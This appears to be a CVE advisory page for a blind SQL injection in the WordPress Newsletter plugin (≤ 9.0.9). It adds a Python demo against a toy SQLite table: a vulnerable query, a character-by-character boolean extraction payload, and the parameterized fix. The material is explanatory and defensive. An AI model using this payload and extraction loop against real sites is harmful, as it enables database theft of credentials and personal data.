CVE-2025-67999
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stefano Lissa Newsletter newsletter allows Blind SQL Injection. This issue affects Newsletter: from n/a through <= 9.0.9.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Blind SQL injection in the WordPress Newsletter plugin (versions ≤ 9.0.9) lets an attacker infer database contents one true/false answer at a time; the CVE description itself does not state what access level is required.
Vulnerability
Overview
The Newsletter plugin for WordPress (versions through 9.0.9) contains a blind SQL injection vulnerability caused by improper neutralization of special elements used in an SQL command [1]. Attacker-controlled input reaches a query without being bound as data, so it is parsed as SQL. The injection is blind because the application never returns the query's result set: the attacker sees only indirect signals (a page that differs between a true and a false condition, an error, or a response delay) and must reconstruct data from those signals, typically one character per request.
Exploitation
According to the cited reference, the vulnerability can be exploited without authentication, requiring only network access to the WordPress site, and the attack complexity is low [1]; note that the CVE description above does not itself state an authentication requirement. Because the plugin is widely installed, the flaw is attractive for automated scanning and large-scale exploitation [1]. An attacker sends crafted HTTP requests to the vulnerable endpoint and reads the result from differences in the responses; every site running an affected version is reachable this way, regardless of how much traffic it serves.
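The following is an added example illustrating the mechanism described in the Overview and Exploitation paragraphs; it is not code from the Newsletter plugin or from the cited references. It uses Python and an in-memory SQLite database as a stand-in for the plugin's PHP and WordPress's MySQL, and the table, column and function names, as well as the subscriber rows, are constructed for illustration only. The vulnerable lookup splices input into the SQL string and returns only a yes/no result, which is exactly the blind condition: the attacker never sees query output, yet recovers a neighbouring column character by character. The fixed lookup binds the input as a parameter, and the same extraction loop recovers nothing.

```python
"""Boolean-based blind SQL injection against a constructed subscriber table,
beside the parameterized fix. Added example; not the Newsletter plugin's code."""
import sqlite3
import string

# Constructed sample rows (assumption: a subscriber table with a secret token column).
SAMPLE_ROWS = [
    ("alice@example.com", "tok_a1b2c3"),
    ("bob@example.com", "tok_9f8e7d"),
]


def make_db():
    """Build an in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (email TEXT, token TEXT)")
    conn.executemany("INSERT INTO subscribers VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def is_subscribed_vulnerable(conn, email):
    """Improper neutralization: the input is formatted straight into the SQL text.

    The caller only learns whether a row matched, so injected conditions are
    blind: no query output, just a True/False signal per request.
    """
    sql = "SELECT 1 FROM subscribers WHERE email = '%s'" % email
    return conn.execute(sql).fetchone() is not None


def is_subscribed_fixed(conn, email):
    """Parameterized query: the input is bound as data and never parsed as SQL.

    (In WordPress the equivalent is $wpdb->prepare() with placeholders.)
    """
    sql = "SELECT 1 FROM subscribers WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone() is not None


def blind_extract_token(oracle, email, alphabet=string.ascii_lowercase + string.digits + "_", max_len=16):
    """Recover the token column one character at a time from a yes/no oracle.

    Each guess closes the quoted literal, appends a condition on the secret
    column, and comments out the trailing quote. SQLite accepts a bare "--";
    MySQL needs a space after it ("-- ").
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in alphabet:
            payload = "%s' AND substr(token,%d,1)='%s'--" % (email, pos, ch)
            if oracle(payload):
                matched = ch
                break
        if matched is None:  # no character matched: end of the value
            break
        recovered += matched
    return recovered


def demo():
    """Run the same extraction against the vulnerable and the fixed lookup."""
    conn = make_db()
    target = "alice@example.com"
    via_vulnerable = blind_extract_token(lambda p: is_subscribed_vulnerable(conn, p), target)
    via_fixed = blind_extract_token(lambda p: is_subscribed_fixed(conn, p), target)
    return via_vulnerable, via_fixed


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable lookup leaked token:", repr(vuln))
    print("parameterized lookup leaked:   ", repr(fixed))
```

Each recovered character costs at most one request per alphabet symbol, which is why blind extraction is slow but fully automatable and why a single exposed boolean (or timing) difference is enough to read an entire column. The fix is the usual one: never build the query text from input; bind it.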
Impact
Successful exploitation lets an attacker query the underlying database, including reading sensitive data such as user credentials, personal information, and other stored content. The cited CVSS score of 7.6 is driven by the high confidentiality impact, while the vendor's own assessment, per the cited reference, rates the practical severity for WordPress environments as low [1]. Blind extraction is slow per request but fully automatable, so the confidentiality rating is the figure to plan around.
Mitigation
According to the cited reference, the vulnerability is fixed in version 9.1.0 of the Newsletter plugin; note that this page's patch index (below) has not yet linked a specific fixing commit. Users are strongly advised to update immediately. If updating is not possible, consulting a hosting provider or web developer for assistance is recommended [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Range: <= 9.0.9
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.